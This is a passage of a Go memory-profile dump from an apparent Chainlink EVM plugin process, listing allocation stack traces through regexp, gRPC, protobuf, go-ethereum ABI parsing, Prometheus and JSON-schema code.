# 0x89f434 net/http.(*Transport).startDialConnForLocked.func1+0x34 /usr/local/go/src/net/http/transport.go:1629
0: 0 [0: 0] @ 0x48e88c 0x493c69 0x6cbf0d 0x6cce7f 0x6cf057 0x6d3ec5 0x6d3872 0x19f967f 0x19f9785 0x19f172b 0x19f0c08 0x1a1caac 0x19fd723 0x19fee05 0x19fe4d1 0x19fe843 0x4a4d0a 0x4994c1
# 0x6cbf0c regexp.(*bitState).reset+0x4c /usr/local/go/src/regexp/backtrack.go:84
# 0x6cce7e regexp.(*Regexp).backtrack+0x19e /usr/local/go/src/regexp/backtrack.go:317
# 0x6cf056 regexp.(*Regexp).doExecute+0x276 /usr/local/go/src/regexp/exec.go:535
# 0x6d3ec4 regexp.(*Regexp).replaceAll+0x184 /usr/local/go/src/regexp/regexp.go:599
# 0x6d3871 regexp.(*Regexp).ReplaceAllString+0xd1 /usr/local/go/src/regexp/regexp.go:557
# 0x19f967e github.com/smartcontractkit/chainlink-evm/pkg/client.sanitizeRPCError+0x5e /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/rpc_client.go:1450
# 0x19f9784 github.com/smartcontractkit/chainlink-evm/pkg/client.(*RPCClient).wrapRPCClientError+0x84 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/rpc_client.go:1465
# 0x19f172a github.com/smartcontractkit/chainlink-evm/pkg/client.(*RPCClient).ethGetBlockByNumber+0x2ca /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/rpc_client.go:852
# 0x19f0c07 github.com/smartcontractkit/chainlink-evm/pkg/client.(*RPCClient).BlockByNumber+0x107 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/rpc_client.go:780
# 0x1a1caab github.com/smartcontractkit/chainlink-evm/pkg/client.(*RPCClient).latestBlock+0x2b /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/client/rpc_client.go:723
# 0x19fd722 github.com/smartcontractkit/chainlink-framework/multinode.(*RPCClientBase[...]).LatestBlock+0xc2 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/rpc_client_base.go:179
# 0x19fee04 github.com/smartcontractkit/chainlink-framework/multinode.(*RPCClientBase[...]).SubscribeToHeads.func1+0xa4 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/rpc_client_base.go:131
# 0x19fe4d0 github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).pollingLoop+0x130 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/poller.go:79
# 0x19fe842 github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).start.(*Engine).Go.func2+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
0: 0 [0: 0] @ 0x48e86c 0x48ea45 0x48eaf3 0x4137bd 0x4137be 0x41370f 0x411505 0x48eb89 0x8f525f 0x8f7d2e 0x978568 0x977d36 0x4994c1
# 0x8f525e google.golang.org/grpc/internal/transport.(*http2Server).operateHeaders+0x1fe /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:407
# 0x8f7d2d google.golang.org/grpc/internal/transport.(*http2Server).HandleStreams+0x2ed /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:665
# 0x978567 google.golang.org/grpc.(*Server).serveStreams+0x367 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1059
# 0x977d35 google.golang.org/grpc.(*Server).handleRawConn.func1+0x55 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:993
0: 0 [0: 0] @ 0x48e88c 0x493c69 0x7398b9 0x739892 0x76f95c 0x76f912 0x76eb7f 0x76b15d 0x769d25 0x762c25 0x763109 0x7630ef 0x763116 0x7d69cf 0x7d6613 0x7cc56e 0x7e142e 0x7e1419 0x73be22 0x73be1b 0x73ba6e 0x90d9bc 0x97c55f 0x9969d5 0x97ae9c 0x980046 0x9787bf 0x4994c1
# 0x7398b8 google.golang.org/protobuf/internal/strs.(*Builder).grow+0x78 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/strs/strings_unsafe.go:66
# 0x739891 google.golang.org/protobuf/internal/strs.(*Builder).AppendFullName+0x51 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/strs/strings_unsafe.go:43
# 0x76f95b google.golang.org/protobuf/internal/filedesc.appendFullName+0x2db /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_init.go:573
# 0x76f911 google.golang.org/protobuf/internal/filedesc.(*Field).unmarshalFull+0x291 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_lazy.go:449
# 0x76eb7e google.golang.org/protobuf/internal/filedesc.(*Message).unmarshalFull+0x129e /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_lazy.go:345
# 0x76b15c google.golang.org/protobuf/internal/filedesc.(*File).unmarshalFull+0x39c /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_lazy.go:167
# 0x769d24 google.golang.org/protobuf/internal/filedesc.(*File).lazyRawInit+0x24 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc_lazy.go:20
# 0x762c24 google.golang.org/protobuf/internal/filedesc.(*File).lazyInitOnce+0x64 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc.go:172
# 0x763108 google.golang.org/protobuf/internal/filedesc.(*File).lazyInit+0x28 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc.go:164
# 0x7630ee google.golang.org/protobuf/internal/filedesc.(*Message).lazyInit+0xe /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc.go:342
# 0x763115 google.golang.org/protobuf/internal/filedesc.(*Message).Fields+0x35 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/filedesc/desc.go:319
# 0x7d69ce google.golang.org/protobuf/internal/impl.(*MessageInfo).makeKnownFieldsFunc+0x6e /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message_reflect.go:57
# 0x7d6612 google.golang.org/protobuf/internal/impl.(*MessageInfo).makeReflectFuncs+0x92 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message_reflect.go:42
# 0x7cc56d google.golang.org/protobuf/internal/impl.(*MessageInfo).initOnce+0x20d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message.go:92
# 0x7e142d google.golang.org/protobuf/internal/impl.(*MessageInfo).init+0x2d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message.go:71
# 0x7e1418 google.golang.org/protobuf/internal/impl.(*messageState).ProtoMethods+0x18 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/internal/impl/message_reflect_gen.go:31
# 0x73be21 google.golang.org/protobuf/proto.protoMethods+0xe1 /go/pkg/mod/google.golang.org/protobuf@v1.36.11/proto/proto_methods.go:19
# 0x73be1a google.golang.org/protobuf/proto.UnmarshalOptions.unmarshal+0xda /go/pkg/mod/google.golang.org/protobuf@v1.36.11/proto/decode.go:100
# 0x73ba6d google.golang.org/protobuf/proto.Unmarshal+0x6d /go/pkg/mod/google.golang.org/protobuf@v1.36.11/proto/decode.go:62
# 0x90d9bb google.golang.org/grpc/encoding/proto.(*codecV2).Unmarshal+0x15b /go/pkg/mod/google.golang.org/grpc@v1.81.0/encoding/proto/proto.go:96
# 0x97c55e google.golang.org/grpc.(*Server).processUnaryRPC.func3+0xfe /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1403
# 0x9969d4 google.golang.org/grpc/health/grpc_health_v1._Health_Check_Handler+0x54 /go/pkg/mod/google.golang.org/grpc@v1.81.0/health/grpc_health_v1/health_grpc.pb.go:221
# 0x97ae9b google.golang.org/grpc.(*Server).processUnaryRPC+0x11db /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1430
# 0x980045 google.golang.org/grpc.(*Server).handleStream+0xbc5 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1856
# 0x9787be google.golang.org/grpc.(*Server).serveStreams.func2.1+0x7e /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1065
0: 0 [0: 0] @ 0x48e893 0x4287c5 0x83887a 0x4a38f1 0x895e87 0x895e7b 0x895977 0x879586 0x8a5cf4 0x4994c1
# 0x838879 net/http.init.func16+0x19 /usr/local/go/src/net/http/server.go:834
# 0x4a38f0 sync.(*Pool).Get+0xb0 /usr/local/go/src/sync/pool.go:155
# 0x895e86 net/http.getCopyBuf+0x66 /usr/local/go/src/net/http/server.go:837
# 0x895e7a net/http.(*transferWriter).doBodyCopy+0x5a /usr/local/go/src/net/http/transfer.go:414
# 0x895976 net/http.(*transferWriter).writeBody+0x356 /usr/local/go/src/net/http/transfer.go:372
# 0x879585 net/http.(*Request).write+0xa85 /usr/local/go/src/net/http/request.go:762
# 0x8a5cf3 net/http.(*persistConn).writeLoop+0x173 /usr/local/go/src/net/http/transport.go:2655
0: 0 [0: 0] @ 0x48e86c 0x4287c5 0x8c8ad3 0x8c8b0e 0x4a36ac 0x8c86a5 0x8c8687 0x8c86ba 0x8c8535 0x8c7d74 0x8c77a5 0x8c75d3 0x8d1092 0x8cbe85 0x8ff67b 0x8f7b3f 0x978568 0x977d36 0x4994c1
# 0x8c8ad2 golang.org/x/net/http2/hpack.newInternalNode+0x172 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/huffman.go:125
# 0x8c8b0d golang.org/x/net/http2/hpack.buildRootHuffmanNode+0x1ad /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/huffman.go:154
# 0x4a36ab sync.(*Once).doSlow+0xab /usr/local/go/src/sync/once.go:78
# 0x8c86a4 sync.(*Once).Do+0x44 /usr/local/go/src/sync/once.go:69
# 0x8c8686 golang.org/x/net/http2/hpack.getRootHuffmanNode+0x26 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/huffman.go:134
# 0x8c86b9 golang.org/x/net/http2/hpack.huffmanDecode+0x59 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/huffman.go:50
# 0x8c8534 golang.org/x/net/http2/hpack.(*Decoder).decodeString+0x94 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/hpack.go:516
# 0x8c7d73 golang.org/x/net/http2/hpack.(*Decoder).parseFieldLiteral+0x333 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/hpack.go:386
# 0x8c77a4 golang.org/x/net/http2/hpack.(*Decoder).parseHeaderFieldRepr+0xe4 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/hpack.go:316
# 0x8c75d2 golang.org/x/net/http2/hpack.(*Decoder).Write+0x132 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/hpack.go:262
# 0x8d1091 golang.org/x/net/http2.(*Framer).readMetaFrame+0x2d1 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:1793
# 0x8cbe84 golang.org/x/net/http2.(*Framer).ReadFrameForHeader+0x364 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:556
# 0x8ff67a google.golang.org/grpc/internal/transport.(*framer).readFrame+0xda /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:504
# 0x8f7b3e google.golang.org/grpc/internal/transport.(*http2Server).HandleStreams+0xfe /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:638
# 0x978567 google.golang.org/grpc.(*Server).serveStreams+0x367 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1059
# 0x977d35 google.golang.org/grpc.(*Server).handleRawConn.func1+0x55 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:993
0: 0 [0: 0] @ 0x48e865 0x4287c5 0x9e10c5 0x9e0972 0xb673a7 0xb675b8 0x12a6e52 0x12a5ab1 0x1d095ed 0x459735 0x4994c1
# 0x9e10c4 runtime/debug.ParseBuildInfo+0x6e4 /usr/local/go/src/runtime/debug/mod.go:218
# 0x9e0971 runtime/debug.ReadBuildInfo+0x31 /usr/local/go/src/runtime/debug/mod.go:26
# 0xb673a6 github.com/smartcontractkit/chainlink-common/pkg/services.(*HealthCheckerConfig).initVerSha+0x26 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/health.go:101
# 0xb675b7 github.com/smartcontractkit/chainlink-common/pkg/services.HealthCheckerConfig.New+0x57 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/health.go:134
# 0x12a6e51 github.com/smartcontractkit/chainlink-common/pkg/loop.(*Server).start+0x1191 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/server.go:313
# 0x12a5ab0 github.com/smartcontractkit/chainlink-common/pkg/loop.MustNewStartedServer+0xb0 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/server.go:63
# 0x1d095ec main.main+0x4c /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/cmd/chainlink-evm/main.go:37
# 0x459734 runtime.main+0x2d4 /usr/local/go/src/runtime/proc.go:290
0: 0 [0: 0] @ 0x48e88c 0x494592 0x536345 0x536430 0x53b614 0x138aad8 0x1384137 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x14d77b7 0x1cfbd9e 0x1ce0d8c 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x494591 internal/bytealg.MakeNoZero+0xb1 /usr/local/go/src/runtime/slice.go:437
# 0x536344 strings.(*Builder).grow+0x24 /usr/local/go/src/strings/builder.go:67
# 0x53642f strings.(*Builder).Grow+0x4f /usr/local/go/src/strings/builder.go:81
# 0x53b613 strings.Join+0xf3 /usr/local/go/src/strings/strings.go:510
# 0x138aad7 github.com/ethereum/go-ethereum/accounts/abi.NewMethod+0x7f7 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/method.go:117
# 0x1384136 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x9d6 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:172
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x14d77b6 github.com/ethereum/go-ethereum/accounts/abi/bind.(*MetaData).GetAbi+0x176 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/bind/old.go:266
# 0x1cfbd9d github.com/smartcontractkit/chainlink-evm/pkg/relay.newOCR3CapabilityLogDecoder+0x1d /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/relay/ocr3_capability_provider.go:45
# 0x1ce0d8b github.com/smartcontractkit/chainlink-evm/pkg/relay.init.0+0x1eb /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/relay/evm.go:79
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 96] @ 0x48e865 0x493c69 0x6d7a67 0x6d4fa4 0x6d7965 0x138fdac 0x13850ef 0x6dec0e 0x6dd7de 0x6de35b 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x1bbea05 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6d7a66 regexp.(*Regexp).FindAllStringSubmatch.func1+0xa6 /usr/local/go/src/regexp/regexp.go:1180
# 0x6d4fa3 regexp.(*Regexp).allMatches+0x2c3 /usr/local/go/src/regexp/regexp.go:790
# 0x6d7964 regexp.(*Regexp).FindAllStringSubmatch+0x64 /usr/local/go/src/regexp/regexp.go:1176
# 0x138fdab github.com/ethereum/go-ethereum/accounts/abi.NewType+0x62b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/type.go:119
# 0x13850ee github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON+0x14e /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/argument.go:53
# 0x6dec0d encoding/json.(*decodeState).object+0x68d /usr/local/go/src/encoding/json/decode.go:610
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bbea04 github.com/smartcontractkit/chainlink-evm/pkg/read.init+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/read/event.go:807
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 896] @ 0x48e86c 0x494207 0x1390992 0x13850ef 0x6dec0e 0x6dd7de 0x6de35b 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x1bbea05 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x1390991 github.com/ethereum/go-ethereum/accounts/abi.NewType+0x1211 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/type.go:188
# 0x13850ee github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON+0x14e /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/argument.go:53
# 0x6dec0d encoding/json.(*decodeState).object+0x68d /usr/local/go/src/encoding/json/decode.go:610
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bbea04 github.com/smartcontractkit/chainlink-evm/pkg/read.init+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/read/event.go:807
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 32768] @ 0x48e88c 0x493c69 0x6f07ee 0x6f0485 0x6f0235 0x13827d4 0x1bbea05 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6f07ed encoding/json.(*Decoder).refill+0xed /usr/local/go/src/encoding/json/stream.go:161
# 0x6f0484 encoding/json.(*Decoder).readValue+0x84 /usr/local/go/src/encoding/json/stream.go:142
# 0x6f0234 encoding/json.(*Decoder).Decode+0x74 /usr/local/go/src/encoding/json/stream.go:65
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bbea04 github.com/smartcontractkit/chainlink-evm/pkg/read.init+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/read/event.go:807
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [0: 0] @ 0x48e893 0x4287c5 0x7867b4 0x78678e 0x546392 0xa09225 0xa08ca8 0xa0397b 0xa0a2fe 0x10afaf1 0x889e69 0x88bc67 0x8aa68e 0x887f50 0x4994c1
# 0x7867b3 compress/flate.NewWriter+0x293 /usr/local/go/src/compress/flate/deflate.go:665
# 0x78678d compress/gzip.(*Writer).Write+0x26d /usr/local/go/src/compress/gzip/gzip.go:191
# 0x546391 bufio.(*Writer).Flush+0x51 /usr/local/go/src/bufio/bufio.go:642
# 0xa09224 github.com/prometheus/common/expfmt.MetricFamilyToText.func1+0x24 /go/pkg/mod/github.com/prometheus/common@v0.67.5/expfmt/text_create.go:96
# 0xa08ca7 github.com/prometheus/common/expfmt.MetricFamilyToText+0x11e7 /go/pkg/mod/github.com/prometheus/common@v0.67.5/expfmt/text_create.go:293
# 0xa0397a github.com/prometheus/common/expfmt.NewEncoder.func7+0x3a /go/pkg/mod/github.com/prometheus/common@v0.67.5/expfmt/encode.go:178
# 0xa0a2fd github.com/prometheus/common/expfmt.encoderCloser.Encode+0x1d /go/pkg/mod/github.com/prometheus/common@v0.67.5/expfmt/encode.go:51
# 0x10afaf0 github.com/prometheus/client_golang/prometheus/promhttp.HandlerForTransactional.func1+0xad0 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/promhttp/http.go:249
# 0x889e68 net/http.HandlerFunc.ServeHTTP+0x28 /usr/local/go/src/net/http/server.go:2286
# 0x88bc66 net/http.(*ServeMux).ServeHTTP+0x1c6 /usr/local/go/src/net/http/server.go:2828
# 0x8aa68d net/http.serverHandler.ServeHTTP+0x8d /usr/local/go/src/net/http/server.go:3311
# 0x887f4f net/http.(*conn).serve+0x64f /usr/local/go/src/net/http/server.go:2073
0: 0 [1: 48] @ 0x48e865 0x4287c5 0x48eb3a 0x48eb4f 0x6e27dc 0x6e25b9 0x6e28e8 0x6deb32 0x6dd7de 0x6dd03e 0x6f031f 0xde77c5 0xde639c 0xddaad7 0xddaf7b 0xddb79f 0xddbcdf 0xddc945 0xddc4d3 0xddbbec 0xde1b87 0xde19ff 0xdddaed 0xddc4d3 0xddbadf 0xddb7f8 0xddacfa 0xddab98 0xde207e 0xde3809 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6e27db encoding/json.(*decodeState).objectInterface+0x1b /usr/local/go/src/encoding/json/decode.go:1079
# 0x6e25b8 encoding/json.(*decodeState).valueInterface+0x58 /usr/local/go/src/encoding/json/decode.go:1043
# 0x6e28e7 encoding/json.(*decodeState).objectInterface+0x127 /usr/local/go/src/encoding/json/decode.go:1110
# 0x6deb31 encoding/json.(*decodeState).object+0x5b1 /usr/local/go/src/encoding/json/decode.go:622
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0xde77c4 github.com/santhosh-tekuri/jsonschema/v5.unmarshal+0x84 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/resource.go:273
# 0xde639b github.com/santhosh-tekuri/jsonschema/v5.newResource+0x7b /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/resource.go:31
# 0xddaad6 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).AddResource+0x36 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:103
# 0xddaf7a github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).findResource+0x1da /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:158
# 0xddb79e github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileURL+0x9e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:216
# 0xddbcde github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x47e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:234
# 0xddc944 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x3c4 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:325
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbbeb github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x38b /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:262
# 0xde1b86 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap.func3+0xc6 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:484
# 0xde19fe github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap.func5+0x13e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:499
# 0xdddaec github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x156c /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:514
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbade github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x27e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:241
